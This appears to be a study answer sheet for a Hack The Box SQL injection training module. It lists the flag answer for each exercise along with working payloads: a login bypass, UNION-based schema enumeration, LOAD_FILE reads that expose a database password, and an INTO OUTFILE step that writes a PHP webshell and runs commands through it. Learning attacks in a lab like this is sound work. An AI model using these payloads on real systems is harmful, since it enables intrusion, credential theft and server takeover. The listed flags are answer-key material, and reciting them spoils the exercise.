HTB SQL INJECTION FUNDAMENTALS

 

Q: Connect to the database using the MySQL client from the command line. Use the 'show databases;' command to list databases in the DBMS. What is the name of the first database?
A: employees
Connect to MySQL server (mind the portnumber!)
SHOW DATABASES;

Q: What is the department number for the 'Development' department?
A: d005


Q: What is the last name of the employee whose first name starts with "Bar" AND who was hired on 1990-01-01?
A: Mitchem


Q: In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?
A: 654


Q: Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?
A: 202a1d1a8b195d5e9a57e434cc16000c


Q: Login as the user with the id 5 to get the flag.
A: cdad9ecdf6f14b45ff5c4de32909caec
`any' OR id =5);#


Q: Connect to the above MySQL server with the 'mysql' tool, and find the number of records returned when doing a 'Union' of all records in the 'employees' table and all records in the 'departments' table.
A: 663


Q: Use a Union injection to get the result of 'user()'
A: root@localhost


Q: What is the password hash for 'newuser' stored in the 'users' table in the 'ilfreight' database?
A: 9da2c9bcdf39d8610954e0e11ea8f45f
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='users'-- - 
(insert via Burp suite, HTTP header injection on /search.php?port_code=)


Q: We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.
A: dB_pAssw0rd_iS_flag!
Retrieve sourcecode:
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
include tag brings us to config.php, so lets check this file.
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -


Q: Find the flag by using a webshell.
A: d2b5b27ae688b6a0f1d21b7d3a0798cd


Q: Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
A: 528d6d9cedc2c7aab146ef226e918396
Login with auth bypass 
Find the possible injection place (searchbar on web application)
Identify number of columns (5)
Test the function of loading files: search=adam'+UNION+select+1,2,3,4,LOAD_FILE("/var/www/html/dashboard/dashboard.php")--+-
Read source code from php file: search=adam'+UNION+select+1,2,3,4,"outfile+success"+into+outfile+"/var/www/html/dashboard/result.txt"--+-
Check results.txt --> http://<RHOST>/dashboard/results.txt
After this we use this function to create a webshell.
search=adam'+UNION+select+1,2,3,4,"<%3fphp+system($_REQUEST[0])%3b+%3f>"+into+outfile+"/var/www/html/dashboard/shell.php"--+-
Execute webshell: http://<RHOST>/dashboard/shell.php?0=id
Search and enumerate to find the flag: GET /dashboard/webproof.php?0=cat+../../../../flag_cae1dadcd174.txt

